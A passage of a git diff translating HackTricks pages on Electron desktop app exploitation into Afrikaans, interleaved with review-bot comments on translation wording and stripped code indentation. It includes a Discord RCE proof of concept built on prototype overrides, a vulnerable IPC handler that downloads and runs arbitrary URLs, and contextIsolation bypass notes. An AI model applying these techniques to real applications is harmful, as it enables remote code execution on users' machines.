misbruik om 'n **nuwe venster te open wat** in die infrastruktuur van die aanvaller geleë is en **gebruikersnaam en wagwoord vra** aan die gebruiker: ```html ``` +## **Gereedskap** -## **Tools** +* [**Electronegativity**](https://github.com/doyensec/electronegativity) is 'n instrument om verkeerde konfigurasies en sekuriteitsantipatrone in Electron-gebaseerde programme te identifiseer. +* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) is 'n oopbron VS Code-inprop vir Electron-programme wat Electronegativity gebruik. +* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) om te kyk vir kwesbare derde party biblioteke. 
+* [**Electro.ng**](https://electro.ng/): Jy moet dit koop. -* [**Electronegativity**](https://github.com/doyensec/electronegativity) is a tool to identify misconfigurations and security anti-patterns in Electron-based applications. -* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) is an open source VS Code plugin for Electron applications that uses Electronegativity. -* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) to check for vulnerable third party libraries -* [**Electro.ng**](https://electro.ng/): You need to buy it +## Laboratoriums -## Labs - -In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) you can find a lab to exploit vulnerable Electron apps. - -Some commands that will help you will the lab: +In [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) kan jy 'n laboratorium vind om kwesbare Electron-programme te misbruik. +Sommige opdragte wat jou sal help met die laboratorium: ```bash # Download apps from these URls # Vuln to nodeIntegration 
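Review bot: several translated headings and terms in this hunk need correcting: "## **RCE: XSS + Oue Chromium**" should be "Ou Chromium", "phising-aanval" should be "phishing-aanval", and "Elektron JS-sekuriteitsbestuurspraktyke" both respells the product name (keep "Electron", as elsewhere in the patch) and mistranslates "security best practices", which is "beste sekuriteitspraktyke", not "bestuurspraktyke". The `-window.addEventListener('click', (e) => {` / `+window.addEventListener('click', (e) => {` pair is visibly identical, so this is a whitespace-only change inside a fenced block; that is the same code-reflow problem as in the earlier hunks and should not be part of a translation commit.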
@@ -325,27 +294,26 @@ cd vulnerable1 npm install npm start ``` - -## **References** +## **Verwysings** * [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028) * [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d) * [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8) * [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg) * [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) -* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) +* Meer navorsing en skrywes oor Electron-sekuriteit in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) * [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
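Review bot: the support footer is translated differently from the copies earlier in this patch: here "Deel jou hacktruuks" and "github-repos", while the Drupal and Electron README footers use "Deel jou hacking-truuks" and "github-opslag", and "ons versameling eksklusiewe" versus "ons versameling van eksklusiewe". Since this footer is boilerplate repeated on every page, generate it from one shared Afrikaans string so all pages stay identical. The references list itself is fine; only the "More researches and write-ups" bullet needed translating.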
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index 6bea0859c..357f562de 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -1,83 +1,77 @@ -# Electron contextIsolation RCE via Electron internal code +# Elektron contextIsolation RCE via Elektron interne kode
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Example 1 +## Voorbeeld 1 -Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) - -"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation: +Voorbeeld vanaf [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) +"exit" gebeurtenisluisteraar word altyd ingestel deur die interne kode wanneer die bladsy laai begin word. Hierdie gebeurtenis word uitgestraal net voor navigasie: ```javascript process.on('exit', function (){ - for (let p in cachedArchives) { - if (!hasProp.call(cachedArchives, p)) continue - cachedArchives[p].destroy() - } +for (let p in cachedArchives) { +if (!hasProp.call(cachedArchives, p)) continue +cachedArchives[p].destroy() +} }) ``` - {% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %} ![](<../../../.gitbook/assets/image (664).png>) -https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists +https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Bestaan nie meer nie -Then it goes here: +Dan gaan dit hier: ![](<../../../.gitbook/assets/image (647).png>) -Where "self" is Node's process object: +Waar "self" Node se prosesobjek is: ![](<../../../.gitbook/assets/image (652) (1).png>) -The process object has a references to "require" function: - +Die prosesobjek het 'n verwysing na die "require" funksie: ``` process.mainModule.require ``` - -As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code: - +Aangesien 
die handler.call die process objek gaan ontvang, kan ons dit oorskryf om willekeurige kode uit te voer: ```html ``` +## Voorbeeld 2 -## Example 2 +Kry die **vereis voorwerp vanaf prototipe besoedeling**. Vanaf [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) -Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) - -Leak: +Lek:
-Exploit: +Exploiteer:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
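Review bot: the title `# Elektron contextIsolation RCE via Elektron interne kode` translates the product name, while the rest of the PR keeps it as "Electron" (e.g. `Electron-sekuriteit` in the README hunk); use `Electron` in the title. Two more things in this hunk: the `process.on('exit', ...)` block has had its indentation stripped (`-  for (let p in cachedArchives) {` became `+for (let p in cachedArchives) {`), and fenced code should be byte-identical to the source in a translation PR; and `Exploiteer:` is a verb where the source `Exploit:` is a noun label, and the IPC file in this same PR renders it as `Uitbuiting:`, so pick one term and use it in both files.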
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md index 3032340a4..6f4524a40 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md @@ -1,125 +1,112 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-If the preload script exposes an IPC endpoint from the main.js file, the renderer process will be able to access it and if vulnerable, a RCE might be possible. +As die preload-skrip 'n IPC-eindpunt van die main.js-lêer blootstel, sal die renderer-proses daartoe toegang hê en as dit kwesbaar is, kan 'n RCE moontlik wees. -**All these examples were taken from here** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Check the video for further information. +**Al hierdie voorbeelde is geneem vanaf hier** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Kyk na die video vir verdere inligting. -# Example 1 - -Check how the `main.js` listens on `getUpdate` and will **download and execute any URL** passed.\ -Check also how `preload.js` **exposes any IPC** event from main. +# Voorbeeld 1 +Kyk hoe die `main.js` luister na `getUpdate` en sal **enige URL aflaai en uitvoer** wat oorgedra word.\ +Kyk ook hoe `preload.js` **enige IPC-gebeurtenis** vanaf die hoofbron blootstel. ```javascript // Part of code of main.js ipcMain.on('getUpdate', (event, url) => { - console.log('getUpdate: ' + url) - mainWindow.webContents.downloadURL(url) - mainWindow.download_url = url +console.log('getUpdate: ' + url) +mainWindow.webContents.downloadURL(url) +mainWindow.download_url = url }); - + mainWindow.webContents.session.on('will-download', (event, item, webContents) => { - console.log('downloads path=' + app.getPath('downloads')) - console.log('mainWindow.download_url=' + mainWindow.download_url); - url_parts = mainWindow.download_url.split('/') - filename = url_parts[url_parts.length-1] - mainWindow.downloadPath = app.getPath('downloads') + '/' + filename - console.log('downloadPath=' + mainWindow.downloadPath) - // Set the save path, making Electron not to prompt a save dialog. 
- item.setSavePath(mainWindow.downloadPath) +console.log('downloads path=' + app.getPath('downloads')) +console.log('mainWindow.download_url=' + mainWindow.download_url); +url_parts = mainWindow.download_url.split('/') +filename = url_parts[url_parts.length-1] +mainWindow.downloadPath = app.getPath('downloads') + '/' + filename +console.log('downloadPath=' + mainWindow.downloadPath) +// Set the save path, making Electron not to prompt a save dialog. +item.setSavePath(mainWindow.downloadPath) - item.on('updated', (event, state) => { - if (state === 'interrupted') { - console.log('Download is interrupted but can be resumed') - } - else if (state === 'progressing') { - if (item.isPaused()) console.log('Download is paused') - else console.log(`Received bytes: ${item.getReceivedBytes()}`) - } - }) +item.on('updated', (event, state) => { +if (state === 'interrupted') { +console.log('Download is interrupted but can be resumed') +} +else if (state === 'progressing') { +if (item.isPaused()) console.log('Download is paused') +else console.log(`Received bytes: ${item.getReceivedBytes()}`) +} +}) - item.once('done', (event, state) => { - if (state === 'completed') { - console.log('Download successful, running update') - fs.chmodSync(mainWindow.downloadPath, 0755); - var child = require('child_process').execFile; - child(mainWindow.downloadPath, function(err, data) { - if (err) { console.error(err); return; } - console.log(data.toString()); - }); - } - else console.log(`Download failed: ${state}`) - }) -}) +item.once('done', (event, state) => { +if (state === 'completed') { +console.log('Download successful, running update') +fs.chmodSync(mainWindow.downloadPath, 0755); +var child = require('child_process').execFile; +child(mainWindow.downloadPath, function(err, data) { +if (err) { console.error(err); return; } +console.log(data.toString()); +}); +} +else console.log(`Download failed: ${state}`) +}) +}) ``` ```javascript // Part of code of preload.js window.electronSend = 
(event, data) => { - ipcRenderer.send(event, data); +ipcRenderer.send(event, data); }; ``` - -Exploit: - +Uitbuiting: ```html ``` +# Voorbeeld 2 -# Example 2 - -If the preload script exposes directly to the renderer a way t call shell.openExternal its possible to obtains RCE - +As die preload-skrip direk aan die renderer 'n manier bied om shell.openExternal te roep, is dit moontlik om RCE te verkry. ```javascript // Part of preload.js code window.electronOpenInBrowser = (url) => { - shell.openExternal(url); +shell.openExternal(url); }; ``` +# Voorbeeld 3 -# Example 3 - -Is the preload script exposes ways to completely communicate with the main process, an XSS will be able to send any event. The impact of this depends on what the main process exposes in terms of IPC. - +As die preload-skrip maniere blootstel om volledig met die hoofproses te kommunikeer, sal 'n XSS in staat wees om enige gebeurtenis te stuur. Die impak hiervan hang af van wat die hoofproses blootstel in terme van IPC. ```javascript window.electronListen = (event, cb) => { - ipcRenderer.on(event, cb); +ipcRenderer.on(event, cb); }; window.electronSend = (event, data) => { - ipcRenderer.send(event, data); +ipcRenderer.send(event, data); }; ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
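Review bot: `vanaf die hoofbron` ("from the main source") for "from main" is a mistranslation; "main" here is the main process, which this same file renders correctly further down as `hoofproses` (`volledig met die hoofproses te kommunikeer`), so use `hoofproses` in the Voorbeeld 1 intro as well. The main.js and preload.js blocks have also had their indentation removed (`-    console.log('getUpdate: ' + url)` became `+console.log('getUpdate: ' + url)`, and similarly for the `will-download` handler); revert the code blocks to the original bytes. Finally, "github repos" is rendered three different ways within this PR: `github-opslag` at the top of this file, `github-opslagplekke` at its bottom, and `github-repos` in the README hunk; settle on one.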
- - diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md index dc30b5291..baadbc49d 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md @@ -1,97 +1,89 @@ -# Electron contextIsolation RCE via preload code +# Elektron contextIsolation RCE via preload-kode
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Example 1 +## Voorbeeld 1 -Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30) +Voorbeeld vanaf [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30) -This code open http(s) links with default browser: +Hierdie kode open http(s)-skakels met die verstekblaaier: ![](<../../../.gitbook/assets/image (375) (1) (1).png>) -Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it. - -Therefore, an attacker could inject this JS code via the XSS or arbitrary page navigation: +Iets soos `file:///C:/Windows/systemd32/calc.exe` kan gebruik word om 'n sakrekenaar uit te voer, die `SAFE_PROTOCOLS.indexOf` voorkom dit. +Daarom kan 'n aanvaller hierdie JS-kode inspuit deur middel van XSS of willekeurige bladsynavigasie: ```html ``` - -As the call to `SAFE_PROTOCOLS.indexOf` will return 1337 always, the attacker can bypass the protection and execute the calc. Final exploit: - +Soos die oproep na `SAFE_PROTOCOLS.indexOf` altyd 1337 sal teruggee, kan die aanvaller die beskerming omseil en die rekenaar uitvoer. Finale aanval: ```html CLICK ``` +Kyk na die oorspronklike dia's vir ander maniere om programme uit te voer sonder om toestemming te vra. -Check the original slides for other ways to execute programs without having a prompt asking for permissions. +Blykbaar is daar 'n ander manier om kode te laai en uit te voer deur iets soos `file://127.0.0.1/electron/rce.jar` te benader. 
-Apparently another way to load and execute code is to access something like `file://127.0.0.1/electron/rce.jar` +## Voorbeeld 2: Discord App RCE -## Example 2: Discord App RCE +Voorbeeld vanaf [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1) -Example from [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1) - -When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via `DiscordNative.nativeModules.requireModule('MODULE-NAME')`, into the web page.\ -Here, I couldn't use modules that can be used for RCE directly, such as _child\_process_ module, but I **found a code where RCE can be achieved by overriding the JavaScript built-in methods** and interfering with the execution of the exposed module. - -The following is the PoC. I was able to confirm that the **calc** application is **popped** up when I c**all the `getGPUDriverVersions` function** which is defined in the module called "_discord\_utils_" from devTools, while **overriding the `RegExp.prototype.test` and `Array.prototype.join`**. +Toe ek die preload-skripte nagaan, het ek gevind dat Discord die funksie blootstel wat dit moontlik maak om sekere toegelate modules te roep deur middel van `DiscordNative.nativeModules.requireModule('MODULE-NAME')` in die webbladsy.\ +Hier kon ek nie modules gebruik wat direk vir RCE gebruik kan word nie, soos die _child\_process_ module, maar ek **het 'n kode gevind waar RCE bereik kan word deur die oorskrywing van die ingeboude JavaScript-metodes** en die inmenging met die uitvoering van die blootgestelde module. +Die volgende is die PoC. 
Ek kon bevestig dat die **calc**-toepassing **verskyn** wanneer ek die `getGPUDriverVersions`-funksie roep wat in die module genaamd "_discord\_utils_" gedefinieer is vanaf devTools, terwyl ek **die `RegExp.prototype.test` en `Array.prototype.join` oorskryf**. ```javascript RegExp.prototype.test=function(){ - return false; +return false; } Array.prototype.join=function(){ - return "calc"; +return "calc"; } DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions(); ``` - -The `getGPUDriverVersions` function tries to execute the program by using the "_execa_" library, like the following: - +Die `getGPUDriverVersions` funksie probeer om die program uit te voer deur die "_execa_" biblioteek te gebruik, soos die volgende: ```javascript module.exports.getGPUDriverVersions = async () => { - if (process.platform !== 'win32') { - return {}; - } +if (process.platform !== 'win32') { +return {}; +} - const result = {}; - const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; +const result = {}; +const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; - try { - result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); - } catch (e) { - result.nvidia = {error: e.toString()}; - } +try { +result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); +} catch (e) { +result.nvidia = {error: e.toString()}; +} - return result; +return result; }; ``` +Gewoonlik probeer die _execa_ om "_nvidia-smi.exe_" uit te voer, wat gespesifiseer word in die `nvidiaSmiPath` veranderlike, maar as gevolg van die oorskryf van `RegExp.prototype.test` en `Array.prototype.join`, **word die argument vervang deur "**_**calc**_**" in die interne verwerking van \_execa**\_**. 
-Usually the _execa_ tries to execute "_nvidia-smi.exe_", which is specified in the `nvidiaSmiPath` variable, however, due to the overridden `RegExp.prototype.test` and `Array.prototype.join`, **the argument is replaced to "**_**calc**_**" in the \_execa**\_**'s internal processing**. - -Specifically, the argument is replaced by changing the following two parts. +Spesifiek word die argument vervang deur die volgende twee dele te verander. [https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36) @@ -99,14 +91,14 @@ Specifically, the argument is replaced by changing the following two parts.
